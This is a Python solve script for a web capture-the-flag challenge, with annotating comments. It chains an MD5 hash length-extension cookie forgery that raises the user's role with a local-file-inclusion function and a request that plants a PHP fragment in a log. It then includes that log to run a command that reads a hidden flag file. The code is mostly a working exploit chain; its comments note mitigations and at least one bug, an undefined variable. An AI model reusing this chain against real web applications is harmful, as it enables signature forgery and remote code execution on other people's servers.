import requests
import sys
from subprocess import Popen, PIPE
import urllib
from base64 import b64decode, b64encode
from pprint import pprint
# Base URL of the challenge. The author intentionally redacted the real
# host ("xxx") because the challenge ends in remote code execution.
url = 'http://xxx.hardtobelieve.me/' # Sorry I have to hide my challenge server, because this is a RCE challenge :D
# Local intercepting proxy. It is not applied globally; it is only passed
# explicitly on the final request (proxies=proxy) so that one request can be
# inspected/rewritten by hand.
proxy = {'http': 'http://localhost:8080'}
# Cookie-bearing session shared by the register and login steps. It is
# rebound later (set to None, then to fresh sessions inside the role-change loop).
s = requests.Session()
# ---------------- Registration ----------------
reg_url = url + 'register.php'
# Registration payload. Two fields are deliberately unusual: the username
# carries a trailing newline and the nickname is a PHP short-open tag
# followed by a line comment. The username value reappears below as part of
# a file name (log_file), so it is presumably written to disk by the server;
# what the nickname is reflected into is not visible in this script.
# Defender-side note: identity fields should reject control characters and
# never be written into anything that is later include()d or executed.
data = {
    'username' : 'testExploit\n',
    'nickname' : '<?=//',
    'password' : 'testExploit'
}
result = s.post(reg_url, data=data)
# The registration page signals failure with an element whose id is 'error'.
if "id='error'" in result.text:
    print '[-] Register failed'
    sys.exit()
else:
    print '[+] Register successfully'
# ----------------------------------------------
# ---------------- Login ----------------
login_url = url + 'login.php'
# Same credentials as registered above, newline included.
data = {
    'username' : 'testExploit\n',
    'password' : 'testExploit'
}
result = s.post(login_url, data=data)
# A successful login is recognised by the word 'Menu' in the response body.
if 'Menu' not in result.text:
    print '[-] Login failed'
    sys.exit()
else:
    print '[+] Login successfully'
# The server issues two cookies: 'data' (URL-encoded twice; base64 underneath,
# see the b64decode() call in the next step) and 'signature', which
# authenticates 'data'. Both are captured as a pair because the signature is
# the input that the length-extension step below works from.
oldAuth = urllib.unquote(urllib.unquote(s.cookies.get_dict()['data']))
oldSig = s.cookies.get_dict()['signature']
print '[+] Old auth:', oldAuth
print '[+] Old Signature:', oldSig
# ----------------------------------------
# ---------------- Change role ----------------
# Run hash_extender to produce candidate (data, signature) pairs. The flags
# document the assumed server-side scheme: an unkeyed MD5 over secret||data
# (--format md5) with an unknown secret length, tried from 1 to 20 bytes.
# A plain Merkle-Damgard hash used as a MAC this way is length-extendable;
# the server-side fix is a keyed MAC that is not extendable (HMAC) together
# with a constant-time comparison of the signature.
process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
    '--secret-min', '1','--secret-max', \
    '20', '--append', ';role=member;suffix=hacked;', '--signature', oldSig, \
    '--format', 'md5'], stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
index_url = url + 'index.php'
# Reset so the check after the loop can detect "no candidate at all".
# NOTE(review): s is re-assigned on every iteration, so `s is None` below is
# only true when the tool printed no records; if the loop exhausts without a
# 'member' match, s keeps the last candidate session and the script continues.
s = None
secret_len = None
# The tool output is parsed as blank-line-separated records of 'Key: value'
# lines, one per candidate secret length; the [:-1] presumably drops an empty
# trailing element after the final '\n\n' — verify against the tool's output.
for tries in stdout.split('\n\n')[:-1]:
    tmpDict = {}
    for line in tries.split('\n'):
        tmpVal = line.split(': ')
        tmpDict[tmpVal[0]] = tmpVal[1]
    s = requests.Session()
    # 'New string' is hex-encoded; the cookie format is base64 (the inverse
    # of the b64decode() applied to the original cookie above).
    s.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
    s.cookies.set('signature', tmpDict['New signature'])
    # NOTE(review): `cookie` is not defined anywhere in this script, so this
    # line raises NameError as written.
    result = s.get(index_url, cookies=cookie)
    secret_len = tmpDict['Secret length']
    # The forged cookie is accepted when the page reflects the appended role.
    if 'member' in result.text:
        print '[+] New Signature:', tmpDict['New signature']
        print '[+] Got premium account'
        break
if s is None:
    print '[-] Cannot get premium account'
    sys.exit()
# print '[-] Debug:', b64encode(tmpDict['New string'].decode('hex'))
print secret_len
# ---------------------------------------------
# ---------------- Read file ----------------
def lfi(path, cmd=''):
    """Request foods.php with a forged cookie pair and return the response body.

    Args:
        path: value sent as the 'page' query parameter.
        cmd: value sent as the 'c' form field (default '').

    Returns:
        The response text (result.text).

    Reads the module globals url, oldAuth, oldSig and secret_len and runs
    ./hash_extender once per call. Defender-side note: 'page' is a
    client-controlled value that the server presumably resolves to a file
    (the local-file-inclusion shape the function name refers to); an
    allow-list of acceptable page names on the server is the mitigation,
    together with not signing cookies with an extendable unkeyed hash.
    """
    food_url = url + 'foods.php'
    param = {
        'page' : path
    }
    data = {
        'c' : cmd
    }
    # Same forgery as the role-change step, but the secret length is now
    # known (--secret instead of --secret-min/--secret-max), so only the
    # first record of the tool output is parsed.
    process = Popen(['./hash_extender/hash_extender', '--data', b64decode(oldAuth), \
        '--secret', secret_len, '--append', ';role=member;suffix=poc;username=hacker', \
        '--signature', oldSig, \
        '--format', 'md5'], stdout=PIPE, stderr=PIPE)
    stdout, stderr = process.communicate()
    # Fresh session so the forged cookies do not mix with the module-level one.
    ss = requests.Session()
    tmpDict = {}
    for line in stdout.split('\n\n')[0].split('\n'):
        tmpVal = line.split(': ')
        tmpDict[tmpVal[0]] = tmpVal[1]
    ss.cookies.set('data', b64encode(tmpDict['New string'].decode('hex')))
    ss.cookies.set('signature', tmpDict['New signature'])
    # Note the locals stdout, data and result shadow the module-level names
    # of the same spelling; nothing outside the function is modified.
    result = ss.post(food_url, params=param, data=data)
    return result.text
# --------------------------------------------
# ---------------- Inject code ----------------
# Values the final step depends on. log_path is presumably a fixed
# server-side directory name; log_file is the registered username
# ('testExploit\n') plus '_hacked', so the file read back appears to be
# keyed on the username -- confirm against the server.
log_path = 'GmQrH5RBZSGizH7EjLl'
log_file = 'testExploit\n_hacked'
# Use burp to modify method
# This request is routed through the local proxy (proxies=proxy) so it can be
# rewritten by hand before reaching the server; per the author's note above,
# the HTTP method is what gets changed. The path carries a PHP fragment, and
# the call right after reads the per-user file back with cmd='exec', so this
# looks like log-file inclusion. Defender-side: never include() a file whose
# contents a client can influence, allow-list the 'page' parameter, and keep
# request logs out of any include path.
s.post(url + "*index.php?*/['c']('cat</home/web300/I_am_SURE_you_cant_guess_this_file_N4M3');?>", proxies=proxy)
print lfi(log_path + '/' + log_file, 'exec')